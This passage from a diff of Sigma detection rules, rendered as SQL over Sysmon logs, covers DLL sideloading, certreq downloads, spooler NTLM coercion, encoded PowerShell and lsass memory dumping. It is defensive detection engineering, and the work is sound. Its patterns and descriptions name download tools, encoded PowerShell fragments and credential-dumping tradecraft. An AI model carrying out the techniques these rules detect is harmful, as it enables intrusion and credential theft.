'%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\assembly\\\\GAC\\_MSIL%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_bad_opsec_sacrificial_processes.yml" + "filename": "image_load_office_dotnet_gac_dll_load.yml" }, { - "title": "MMC Spawning Windows Shell", - "id": "05a2ab7e-ce11-4b63-86db-ab32e763e11d", + "title": "Svchost DLL Search Order Hijack", + "id": "602a1f13-c640-4d73-b053-be9a2fa58b77", "status": "test", - "description": "Detects a Windows command line executable started from MMC", - "author": "Karneades, Swisscom CSIRT", + "description": "Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system\nIKEEXT and SessionEnv service, as they call LoadLibrary on files that do not exist within C:\\Windows\\System32\\ by default.\nAn attacker can place their malicious logic within the PROCESS_ATTACH block of their library and restart the aforementioned services \"svchost.exe -k netsvcs\" to gain code execution on a remote machine.\n", + "author": "SBousseaden", "tags": [ - "attack.lateral_movement", - "attack.t1021.003" + "attack.persistence", + "attack.defense_evasion", + "attack.t1574.002", + "attack.t1574.001" + ], + "falsepositives": [ + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\mmc.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR Image LIKE '%\\\\BITSADMIN%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\tsmsisrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tsvipsrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlbsctrl.dll' ESCAPE '\\')) AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mmc_susp_child_process.yml" + "filename": "image_load_side_load_svchost_dlls.yml" }, { - "title": "Suspicious DumpMinitool Usage", - "id": "eb1c4225-1c23-4241-8dd4-051389fde4ce", + "title": "Suspicious Volume Shadow Copy Vsstrace.dll Load", + "id": "48bfd177-7cf2-412b-ad77-baf923489e82", "status": "experimental", - "description": "Detects suspicious ways to use of a Visual Studio bundled tool named DumpMinitool.exe", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the image load of VSS DLL by uncommon executables", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\DumpMinitool.exe' ESCAPE '\\' OR OriginalFileName = 'DumpMinitool.exe') AND ((NOT ((Image LIKE '%\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Extensions\\\\%' ESCAPE '\\')) OR CommandLine LIKE '%.txt%' ESCAPE '\\') OR (CommandLine LIKE '% Full%' ESCAPE '\\' AND NOT (CommandLine LIKE '%--dumpType%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\vsstrace.dll' ESCAPE '\\' AND NOT (((Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Temp\\\\{%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_dumpminitool_susp_execution.yml" + "filename": "image_load_dll_vsstrace_susp_load.yml" }, { - "title": "Suspicious Certreq Command to Download", - "id": "4480827a-9799-4232-b2c4-ccc6c4e9e12b", + "title": "HackTool - SharpEvtMute DLL Load", + "id": "49329257-089d-46e6-af37-4afce4290685", "status": "experimental", - "description": "Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects the load of EvtMuteHook.dll, a key component of SharpEvtHook, a tool that tampers with the Windows event logs", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Unlikely" + "Other DLLs with the same Imphash" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certreq.exe' ESCAPE '\\' OR OriginalFileName = 'CertReq.exe') AND (CommandLine LIKE '% -Post %' ESCAPE '\\' AND CommandLine LIKE '% -config %' ESCAPE '\\' AND CommandLine LIKE '% http%' ESCAPE '\\' AND CommandLine LIKE '% C:\\\\windows\\\\win.ini %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Hashes LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\' OR Imphash = '330768a4f172e10acb6287b87289d83b'))" ], - "filename": "proc_creation_win_lolbin_susp_certreq_download.yml" + "filename": "image_load_hktl_sharpevtmute.yml" }, { - "title": "Suspicious NTLM Authentication on the Printer Spooler Service", - "id": "bb76d96b-821c-47cf-944b-7ce377864492", + "title": "Potential Rcdll.DLL Sideloading", + "id": "6e78b74f-c762-4800-82ad-f66787f10c8a", "status": "experimental", - "description": "Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service", - "author": "Elastic (idea), Tobias Michalski (Nextron Systems)", + "description": "Detects potential DLL sideloading of rcdll.dll", + "author": "X__Junior (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.privilege_escalation", - "attack.credential_access", - "attack.t1212" + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND (CommandLine LIKE '%spoolss%' ESCAPE '\\' OR CommandLine LIKE '%srvsvc%' ESCAPE '\\' OR CommandLine LIKE '%/print/pipe/%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\rcdll.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Kits\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_ntlmrelay.yml" + "filename": "image_load_side_load_rcdll.yml" }, { - "title": "PowerShell Base64 Encoded Invoke Keyword", - "id": "6385697e-9f1b-40bd-8817-f4a91f40508e", - "status": "test", - "description": "Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls", - "author": "pH-T (Nextron Systems), Harjot Singh, '@cyb3rjy0t'", + "title": "DLL Sideloading Of DBGHELP.DLL", + "id": "6414b5cd-b19d-447e-bb5e-9f03940b5784", + "status": "experimental", + "description": "Detects DLL sideloading of \"dbghelp.dll\"", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ - "attack.execution", - "attack.t1059.001", "attack.defense_evasion", - "attack.t1027" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unlikely" + "Legitimate applications loading their own versions of the DLL mentioned in this rule" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%SQBuAHYAbwBrAGUALQ%' ESCAPE '\\' OR CommandLine LIKE '%kAbgB2AG8AawBlAC0A%' ESCAPE '\\' OR CommandLine LIKE '%JAG4AdgBvAGsAZQAtA%' ESCAPE '\\' OR CommandLine LIKE '%SW52b2tlL%' ESCAPE '\\' OR CommandLine LIKE '%ludm9rZS%' ESCAPE '\\' OR CommandLine LIKE '%JbnZva2Ut%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\') OR (ImageLoaded LIKE '%\\\\Epic Games\\\\Launcher\\\\Engine\\\\Binaries\\\\ThirdParty\\\\DbgHelp\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Epic Games\\\\MagicLegends\\\\x86\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Anaconda3\\\\Lib\\\\site-packages\\\\vtrace\\\\platforms\\\\windll\\\\amd64\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Anaconda3\\\\Lib\\\\site-packages\\\\vtrace\\\\platforms\\\\windll\\\\i386\\\\dbghelp.dll' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_base64_invoke.yml" + "filename": "image_load_side_load_dbghelp_dll.yml" }, { - "title": "Suspicious AgentExecutor PowerShell Execution", - "id": "c0b40568-b1e9-4b03-8d6c-b096da6da9ab", + "title": "DLL Sideloading Of ShellChromeAPI.DLL", + "id": "ee4c5d06-3abc-48cc-8885-77f1c20f4451", "status": "experimental", - "description": "Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by 6th positional argument", - "author": "Nasreddine Bencherchali (Nextron Systems), memory-shards", + "description": "Detects processes loading the non-existent DLL \"ShellChromeAPI\". One known example is the \"DeviceEnroller\" binary in combination with the \"PhoneDeepLink\" flag tries to load this DLL.\nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\AgentExecutor.exe' ESCAPE '\\' OR OriginalFileName = 'AgentExecutor.exe') AND (CommandLine LIKE '% -powershell%' ESCAPE '\\' OR CommandLine LIKE '% -remediationScript%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%C:\\\\Windows\\\\SysWOW64\\\\WindowsPowerShell\\\\v1.0\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE '%\\\\ShellChromeAPI.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_agentexecutor_susp_usage.yml" + "filename": "image_load_side_load_shell_chrome_api.yml" }, { - "title": "TrustedPath UAC Bypass Pattern", - "id": "4ac47ed3-44c2-4b1f-9d51-bf46e8914126", + "title": "VBA DLL Loaded Via Office Application", + "id": "e6ce8457-68b1-485b-9bdd-3c2b5d679aa9", "status": "test", - "description": "Detects indicators of a UAC bypass method by mocking directories", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects VB DLL's loaded by an office application. Which could indicate the presence of VBA Macros.", + "author": "Antonlovesdnb", "tags": [ - "attack.defense_evasion", - "attack.t1548.002" + "attack.execution", + "attack.t1204.002" ], "falsepositives": [ - "Unknown" + "Legitimate macro usage. Add the appropriate filter according to your environment" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%C:\\\\Windows \\\\System32\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND (ImageLoaded LIKE '%\\\\VBE7.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VBEUI.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VBE7INTL.DLL' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_trustedpath.yml" + "filename": "image_load_office_vbadll_load.yml" }, { - "title": "Suspicious Spool Service Child Process", - "id": "dcdbc940-0bff-46b2-95f3-2d73f848e33b", - "status": "test", - "description": "Detects suspicious print spool service (spoolsv.exe) child processes.", - "author": "Justin C. (@endisphotic), @dreadphones (detection), Thomas Patzke (Sigma rule)", + "title": "Suspicious Volume Shadow Copy VSS_PS.dll Load", + "id": "333cdbe8-27bb-4246-bf82-b41a0dca4b70", + "status": "experimental", + "description": "Detects the image load of vss_ps.dll by uncommon executables", + "author": "Markus Neis, @markus_neis", "tags": [ - "attack.execution", - "attack.t1203", - "attack.privilege_escalation", - "attack.t1068" + "attack.defense_evasion", + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND IntegrityLevel = 'System') AND ((((((Image LIKE '%\\\\gpupdate.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\nltest.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskmgr.exe' ESCAPE '\\' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\wget.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\accesschk.exe' ESCAPE '\\' OR Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR Image LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cipher.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\write.exe' ESCAPE '\\' OR Image LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\') OR ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '%start%' ESCAPE '\\'))) OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.spl%' ESCAPE '\\' OR CommandLine LIKE '%route add%' ESCAPE '\\' OR CommandLine LIKE '%program files%' ESCAPE '\\')))) OR (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%add portopening%' ESCAPE '\\' OR CommandLine LIKE '%rule name%' ESCAPE '\\')))) OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '%.spl%' ESCAPE '\\'))) OR ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine LIKE '%rundll32.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\vss\\_ps.dll' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\clussvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\dismhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\inetsrv\\\\appcmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\inetsrv\\\\iissetup.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\searchindexer.exe' ESCAPE '\\' OR Image LIKE '%\\\\srtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor64.exe' ESCAPE '\\' OR Image LIKE '%\\\\tiworker.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\SystemPropertiesAdvanced.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (CommandLine LIKE 'C:\\\\$WinREAgent\\\\Scratch\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\dismhost.exe {%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_spoolsv_susp_child_processes.yml" + "filename": "image_load_dll_vss_ps_susp_load.yml" }, { - "title": "Script Event Consumer Spawning Process", - "id": "f6d1dd2f-b8ce-40ca-bc23-062efb686b34", - "status": "experimental", - "description": "Detects a suspicious child process of Script Event Consumer (scrcons.exe).", - "author": "Sittikorn S", + "title": "Fax Service DLL Search Order Hijack", + "id": "828af599-4c53-4ed2-ba4a-a9f835c434ea", + "status": "test", + "description": "The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.", + "author": "NVISO", "tags": [ - "attack.execution", - "attack.t1047" + "attack.persistence", + "attack.defense_evasion", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\scrcons.exe' ESCAPE '\\' AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fxssvc.exe' ESCAPE '\\' AND ImageLoaded LIKE '%ualapi.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_scrcons_susp_child_process.yml" + "filename": "image_load_side_load_ualapi.yml" }, { - "title": "Suspicious PowerShell Child Processes", - "id": "e4b6d2a7-d8a4-4f19-acbd-943c16d90647", - "status": "experimental", - "description": "Detects suspicious child processes spawned by PowerShell", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "title": "Load Of Dbghelp/Dbgcore DLL From Suspicious Process", + "id": "0e277796-5f23-4e49-a490-483131d4f6e1", + "status": "test", + "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecraft use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", + "author": "Perez Diego (@darkquassar), oscd.community, Ecco", + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') AND (Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\')) AND NOT ((ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkspacesConfig\\\\Scripts\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkspacesConfig\\\\Scripts\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\') AND (Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\monitoringhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\dnx.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE 'C:\\\\WINDOWS\\\\winsxs\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\TiWorker.exe -Embedding' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_susp_child_processes.yml" + "filename": "image_load_dll_dbghelp_dbgcore_susp_load.yml" }, { - "title": "Suspicious Obfuscated PowerShell Code", - "id": "8d01b53f-456f-48ee-90f6-bc28e67d4e35", + "title": "Microsoft Office DLL Sideload", + "id": "829a3bdf-34da-4051-9cf4-8ed221a8ae4f", "status": "experimental", - "description": "Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%IAAtAGIAeABvAHIAIAAwAHgA%' ESCAPE '\\' OR CommandLine LIKE '%AALQBiAHgAbwByACAAMAB4A%' ESCAPE '\\' OR CommandLine LIKE '%gAC0AYgB4AG8AcgAgADAAeA%' ESCAPE '\\' OR CommandLine LIKE '%AC4ASQBuAHYAbwBrAGUAKAApACAAfAAg%' ESCAPE '\\' OR CommandLine LIKE '%AuAEkAbgB2AG8AawBlACgAKQAgAHwAI%' ESCAPE '\\' OR CommandLine LIKE '%ALgBJAG4AdgBvAGsAZQAoACkAIAB8AC%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMQB9AHsAMAB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADEAfQB7ADAAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAxAH0AewAwAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMAB9AHsAMwB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADAAfQB7ADMAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAwAH0AewAzAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMgB9AHsAMAB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADIAfQB7ADAAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAyAH0AewAwAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMQB9AHsAMAB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADEAfQB7ADAAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAxAH0AewAwAH0AJwAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMAB9AHsAMwB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADAAfQB7ADMAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAwAH0AewAzAH0AJwAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMgB9AHsAMAB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADIAfQB7ADAAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAyAH0AewAwAH0AJwAgAC0AZgAg%' 